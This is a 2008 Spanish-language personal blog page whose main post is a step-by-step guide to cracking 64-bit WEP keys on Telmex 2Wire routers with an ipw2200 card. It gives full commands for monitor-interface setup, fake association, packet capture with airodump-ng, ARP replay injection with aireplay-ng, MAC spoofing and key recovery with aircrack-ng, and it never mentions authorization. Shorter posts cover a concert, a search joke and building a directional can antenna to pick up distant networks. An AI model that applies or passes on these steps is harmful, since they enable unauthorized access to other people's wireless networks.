↑ ↑ ↓ ↓ ← → ← → B A

24 febrero, 2008

inyeccion con ipw2200 sobre 2Wire de Telmex con wep de 64 bits

Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200

bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:

tengo entendido que solo se pueden usar los ataques con este metodo

2 (--interactive)
3 (--arpreplay)
4 (--chopchop)

2)primero haz un scan con

iwlist dispositivo scan

y apunta el mac del AP y el canal esto es importante

3) opcional compila e instala el aircrack siempre lo hago xD ----
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
----------------------------------------------------------------

4)ahora activamos la interfaz de rtap

quitamos el modulo de ipw2200
modprobe -r ipw2200

si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 - create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface

cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1

con esto activamos la interfaz rtap

5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay

iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

6)levantamos las interfaces

ifconfig eth1 up
ifconfig rtap0 up

si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1...

7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng --channel --bssid -w jijoju rtap0
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados

8)ahora abrimos aireplay
aireplay-ng --arpreplay -x 1024 -b bssid ap -h tumac -i rtap0 eth1
--arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress (puedes cambiarla (siempre lo hago) usando ifconfig eth1 hw ether 00:11:22:33:44:55 o lo que se te ocurra)
-i que capture de este dispositivo (s)

9)esperamos un rato yo me espero a las 100000 iv's

despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z

aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)

tiempo estimado ... 10 minutos
mas info aqui

23 febrero, 2008

Iron Maiden en Guadalajara

asi es, despues de mucho... mucho... bastante... tiempo de esperar por fin pude ir a un concierto de iron maiden. en vivo no tienen madre son muy chingones el concierto estuvo exelente, sublime que mas da despues de gritar por mas de 2 horas y guardar un boleto por mas de 3 meses...
eso y un video de mala calidad... xD

21 febrero, 2008

ten suerte en google

si pones find chuck norris y voy a tener suerte

xD

14 febrero, 2008

Calico Jack en mi wireless

le he puesto un pequeño detalle a mi lata

12 febrero, 2008

Mi antena Wireless

bueno pues ya me he creado mi propia antena basandome en la antena de patatas de bote, el material que se necesita para esto es:

1 bote de hojalata en mi caso diametro 10 cm y largo 31 cm
1 conector tipo N macho
1 conector tipo N hembra
cable lmr 200 , 300 o 400. ( yo use el lmr 200 de 3 metros por su facilidad de manejo aunque no tiene tanto blindaje como los otros y costo)
1 usb wireless chipset Zydas ( linux las reconoce simplemente conectandolas )
1 alambre de cobre

navaja
cautin
soldadura
pinzas
tornillos

pues primero y la parte mas dificil a mi parecer es onseguir el cable y los ocnectores tipo N , son un poco costosos y aqui en mi ciudad solo encontre a 1 que los vende, pero en internet en paginas de ventas pueden conseguirlos. uso un N macho y un SMA

la usb wireless que uso chipset zydas

el hoyo lo he hecho a 1/3 de la lata

y quedo maso o menos asi

al conector tipo N le he soldado el alambre de cobre en mi caso de 5 cm

luego montamos el conector N en el bote

ahora conectamos la lata

ahora si buscamos redes con la tarjeta integrada de la laptop

y ahora con la antena

para hacer la perforacion de la lata existen calculadoras , busquen en google "cantena calculator"

hagan su antena :)

si buscas mas potencia aunque la verdad esa cosa esta mal montada , creo que seria mejor una lata mas pequeña para esta antena

es direccional asi que hay que apuntar y tener suerte.